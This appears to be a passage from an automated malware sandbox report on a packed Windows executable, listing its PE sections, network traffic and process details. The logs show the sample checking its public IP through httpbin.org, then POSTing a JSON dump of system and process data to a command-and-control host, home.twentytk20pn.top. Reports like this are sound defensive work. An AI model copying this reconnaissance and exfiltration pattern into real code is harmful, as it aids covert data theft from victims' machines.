| | 0x1000 | 0x617000 | 0x283e00 | 3f0c6da58bd980d0da9ce5d705798834 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x618000 | 0x2b0 | 0x200 | 5ee0affac9946bfe80db244b29256d00 | False | 0.798828125 | data | 6.10284653547224 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x619000 | 0x1000 | 0x200 | e8fbf92e0939d0cd4935f0fe539e974d | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x61a000 | 0x37e000 | 0x200 | f55e6a6dead6076ea79d167f3858cbdf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| jjnhjgow | 0x998000 | 0x1b0000 | 0x1afe00 | d41378ede797d70000d94866a61d029f | False | 0.9944498462373372 | data | 7.956153256454164 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| esuyrufd | 0xb48000 | 0x1000 | 0x400 | 6fc9ce45163daba0d3983085382fa87c | False | 0.7666015625 | data | 6.030541377984814 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0xb49000 | 0x3000 | 0x2200 | 28eec474db5f14327a32b58db7c33a7f | False | 0.06606158088235294 | DOS executable (COM) | 0.7757499404800886 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0xb47ad4 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535 |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                    Dec 20, 2024 17:06:53.125932932 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125965118 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126163006 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126224995 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126487017 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126522064 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126569986 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126617908 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126781940 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126808882 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126936913 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126964092 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127033949 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127063036 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127110004 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127137899 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127198935 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127248049 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127295017 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127341986 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127374887 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127422094 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127490997 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127518892 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127567053 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127593040 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127650023 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127676964 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127758980 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127806902 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127840042 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127969980 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127998114 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128030062 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128145933 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128174067 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128201008 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128248930 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128277063 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128576040 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:53.167130947 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167169094 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167273998 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167342901 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167435884 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167470932 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167536020 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167567015 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167613983 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167648077 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167752028 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167781115 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167861938 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167891026 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167924881 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167972088 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168132067 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168159962 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168190956 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168291092 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168318987 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168345928 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168379068 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168482065 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168586016 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168661118 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168790102 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168818951 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168867111 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168894053 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168925047 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169006109 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169131994 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169161081 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169188976 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169214964 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169357061 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169384956 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169411898 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169440031 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169467926 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169497013 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169547081 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169590950 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169642925 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169671059 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169718027 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169744968 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169776917 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169823885 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169981003 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.170023918 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.170074940 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.170226097 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.248889923 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.248929024 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.248958111 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249011040 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249057055 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249146938 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249305964 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249335051 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249362946 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249489069 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249660015 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249689102 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249805927 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249834061 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250148058 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250190020 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250293016 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250458002 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250487089 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250515938 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250621080 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250631094 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250658989 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250700951 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250750065 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250777960 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250837088 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250864983 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250914097 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250950098 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251079082 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251106977 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251214027 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251241922 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251269102 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251311064 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251379967 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251410007 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251437902 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.121788979 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.122031927 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.122117996 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:24.122400999 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:24.242183924 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.812546015 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:24.935003996 CET8049716147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.935153961 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:24.936028004 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:25.055536985 CET8049716147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:32.938075066 CET8049716147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:32.938285112 CET8049716147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:32.938344002 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:32.938601017 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:33.058844090 CET8049716147.45.113.159192.168.2.12
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 17:06:48.110636950 CET | 61648 | 53 | 192.168.2.12 | 1.1.1.1
Dec 20, 2024 17:06:48.110812902 CET | 61648 | 53 | 192.168.2.12 | 1.1.1.1
Dec 20, 2024 17:06:48.248334885 CET | 53 | 61648 | 1.1.1.1 | 192.168.2.12
Dec 20, 2024 17:06:48.413999081 CET | 53 | 61648 | 1.1.1.1 | 192.168.2.12
Dec 20, 2024 17:06:51.263840914 CET | 61651 | 53 | 192.168.2.12 | 1.1.1.1
Dec 20, 2024 17:06:51.263920069 CET | 61651 | 53 | 192.168.2.12 | 1.1.1.1
Dec 20, 2024 17:06:51.401454926 CET | 53 | 61651 | 1.1.1.1 | 192.168.2.12
Dec 20, 2024 17:06:51.401608944 CET | 53 | 61651 | 1.1.1.1 | 192.168.2.12
Dec 20, 2024 17:07:24.674318075 CET | 49320 | 53 | 192.168.2.12 | 1.1.1.1
Dec 20, 2024 17:07:24.674417019 CET | 49320 | 53 | 192.168.2.12 | 1.1.1.1
Dec 20, 2024 17:07:24.811418056 CET | 53 | 49320 | 1.1.1.1 | 192.168.2.12
Dec 20, 2024 17:07:24.811479092 CET | 53 | 49320 | 1.1.1.1 | 192.168.2.12
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 17:06:48.110636950 CET | 192.168.2.12 | 1.1.1.1 | 0x3b33 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:48.110812902 CET | 192.168.2.12 | 1.1.1.1 | 0xa5ad | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 20, 2024 17:06:51.263840914 CET | 192.168.2.12 | 1.1.1.1 | 0xe6b4 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:51.263920069 CET | 192.168.2.12 | 1.1.1.1 | 0xa6fe | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:07:24.674318075 CET | 192.168.2.12 | 1.1.1.1 | 0x4130 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:07:24.674417019 CET | 192.168.2.12 | 1.1.1.1 | 0xe2e9 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 17:06:48.248334885 CET | 1.1.1.1 | 192.168.2.12 | 0x3b33 | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:48.248334885 CET | 1.1.1.1 | 192.168.2.12 | 0x3b33 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:51.401608944 CET | 1.1.1.1 | 192.168.2.12 | 0xe6b4 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:07:24.811479092 CET | 1.1.1.1 | 192.168.2.12 | 0x4130 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
                                                    • httpbin.org
                                                    • home.twentytk20pn.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49711 | 147.45.113.159 | 80 | 6988 | C:\Users\user\Desktop\fnuFOEqg4j.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 17:06:51.523880959 CET | 12360 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                    Host: home.twentytk20pn.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 506466
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710809", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                    Dec 20, 2024 17:07:24.121788979 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.12 | 49716 | 147.45.113.159 | 80 | 6988 | C:\Users\user\Desktop\fnuFOEqg4j.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Dec 20, 2024 17:07:24.936028004 CET | 272 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                    Host: home.twentytk20pn.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 128
                                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                    Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
                                                    Dec 20, 2024 17:07:32.938075066 CET | 309 | IN | HTTP/1.1 502 Bad Gateway
                                                    Server: nginx/1.22.1
                                                    Date: Fri, 20 Dec 2024 16:07:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.12 | 49710 | 98.85.100.80 | 443 | 6988 | C:\Users\user\Desktop\fnuFOEqg4j.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-12-20 16:06:50 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                    Host: httpbin.org
                                                    Accept: */*
                                                    2024-12-20 16:06:50 UTC | 224 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 20 Dec 2024 16:06:50 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Connection: close
                                                    Server: gunicorn/19.9.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Credentials: true
                                                    2024-12-20 16:06:50 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                    Data Ascii: { "origin": "8.46.123.189"}



                                                    Target ID:0
                                                    Start time:11:06:44
                                                    Start date:20/12/2024
                                                    Path:C:\Users\user\Desktop\fnuFOEqg4j.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\fnuFOEqg4j.exe"
                                                    Imagebase:0x4a0000
                                                    File size:4'421'632 bytes
                                                    MD5 hash:61039D97D478405525707E3C0B4B3003
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    No disassembly